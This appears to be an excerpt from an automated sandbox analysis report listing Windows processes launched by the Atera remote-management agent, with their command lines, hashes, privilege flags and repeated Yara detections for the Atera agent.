                                                                                                                                                                                                                                                                                              Start time:06:58:37
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" 52187e48-563c-468d-9785-3542f81fb412 "69e8737b-1308-4d43-800a-39f09304f118" agent-api.atera.com/Production 443 or8ixLi90Mf "syncprofile" 001Q300000P2oAPIAZ
                                                                                                                                                                                                                                                                                              Imagebase:0x1f71c980000
                                                                                                                                                                                                                                                                                              File size:407'080 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:810F893E58861909B134FA72E3BC90CD
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.2086789811.000001F71CC8A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.2086225642.000001F71CBE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.2167638496.00007FFDEE579000.00000004.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.2090670816.000001F71D9F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.2088596650.000001F71CD62000.00000002.00000001.01000000.0000001F.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.2117541148.000001F735B47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.2130001397.000001F736A95000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.2117541148.000001F735AFF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.2086789811.000001F71CC4C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.2086789811.000001F71CC40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.2117541148.000001F735AE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.2085777779.000001F71CA70000.00000004.00000020.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.2129964799.000001F736897000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.2086789811.000001F71CCCA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.2090670816.000001F71D421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.2130229312.000001F736AA6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.2086789811.000001F71CC81000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:36
                                                                                                                                                                                                                                                                                              Start time:06:58:37
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:37
                                                                                                                                                                                                                                                                                              Start time:06:58:49
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6f8440000
                                                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.2246580986.0000021E95E00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000003.2164597390.0000021E96060000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.2246580986.0000021E95E0B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.2246818661.0000021E96040000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.2246580986.0000021E95E23000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:38
                                                                                                                                                                                                                                                                                              Start time:06:58:49
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:39
                                                                                                                                                                                                                                                                                              Start time:06:58:49
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cscript.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6fd2d0000
                                                                                                                                                                                                                                                                                              File size:161'280 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000027.00000002.2245155748.0000014BCFED0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:40
                                                                                                                                                                                                                                                                                              Start time:06:58:50
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\sppsvc.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\sppsvc.exe
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff68a330000
                                                                                                                                                                                                                                                                                              File size:4'630'384 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:320823F03672CEB82CC3A169989ABD12
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:41
                                                                                                                                                                                                                                                                                              Start time:06:58:58
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k smphost
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:42
                                                                                                                                                                                                                                                                                              Start time:06:59:06
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" 52187e48-563c-468d-9785-3542f81fb412 "e82d88f8-5758-4c6f-9f7b-8b023b21ca56" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000P2oAPIAZ
                                                                                                                                                                                                                                                                                              Imagebase:0x22039cd0000
                                                                                                                                                                                                                                                                                              File size:57'896 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:E9794F785780945D2DDE78520B9BB59F
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2783908899.000002203A1E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2773209313.0000022039FDF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2788069108.000002203A9F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2788069108.000002203A88F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2861314309.0000022052F2E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2788069108.000002203A8E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2771051408.0000022039EF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2773209313.0000022039F38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2773209313.0000022039F32000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2782802387.000002203A0C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2865179818.0000022052F84000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2865179818.0000022052F62000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2773209313.0000022039F7D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2856986340.0000022052EF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2860089615.0000022052F21000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2861314309.0000022052F3B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2788069108.000002203A771000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2766545680.000000EFDD1B3000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2788069108.000002203AA04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000000.2335964500.0000022039CD2000.00000002.00000001.01000000.00000027.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:43
                                                                                                                                                                                                                                                                                              Start time:06:59:06
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:44
                                                                                                                                                                                                                                                                                              Start time:06:59:09
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" 52187e48-563c-468d-9785-3542f81fb412 "c4c25269-0a4b-4daf-adc0-e2db93d9b9dd" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000P2oAPIAZ
                                                                                                                                                                                                                                                                                              Imagebase:0x214714d0000
                                                                                                                                                                                                                                                                                              File size:33'320 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:2EC1D28706B9713026E8C6814E231D7C
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002C.00000000.2361394254.00000214714D2000.00000002.00000001.01000000.00000028.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002C.00000002.3063046700.0000021400001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002C.00000002.3063046700.0000021400062000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002C.00000002.3060991724.000000403D931000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002C.00000002.3063046700.000002140007F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:45
                                                                                                                                                                                                                                                                                              Start time:06:59:09
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:46
                                                                                                                                                                                                                                                                                              Start time:06:59:10
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" schedulerrun
                                                                                                                                                                                                                                                                                              Imagebase:0x18457420000
                                                                                                                                                                                                                                                                                              File size:57'896 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:E9794F785780945D2DDE78520B9BB59F
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002E.00000002.2452632944.0000018457840000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002E.00000002.2432153923.0000018457560000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002E.00000002.2432153923.000001845759E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002E.00000002.2459812638.0000018457F13000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002E.00000002.2432153923.000001845757B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002E.00000002.2459812638.0000018457E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002E.00000002.2432153923.00000184575E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:47
                                                                                                                                                                                                                                                                                              Start time:06:59:11
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe" 52187e48-563c-468d-9785-3542f81fb412 "440dfd42-8399-4319-8ab9-c9695127bb3a" agent-api.atera.com/Production 443 or8ixLi90Mf "pollAll" 001Q300000P2oAPIAZ
                                                                                                                                                                                                                                                                                              Imagebase:0x22b81dc0000
                                                                                                                                                                                                                                                                                              File size:219'696 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:01807774F043028EC29982A62FA75941
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2434389216.0000022B821F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2454916097.0000022B9AF04000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2437952320.0000022B827F4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2420250702.0000022B82032000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2454916097.0000022B9AE50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2437952320.0000022B828B3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2437952320.0000022B8269E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000000.2379668284.0000022B81DC2000.00000002.00000001.01000000.0000002A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2437952320.0000022B826A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2437952320.0000022B828BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2437952320.0000022B828B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2420250702.0000022B8206B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2437952320.0000022B828BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
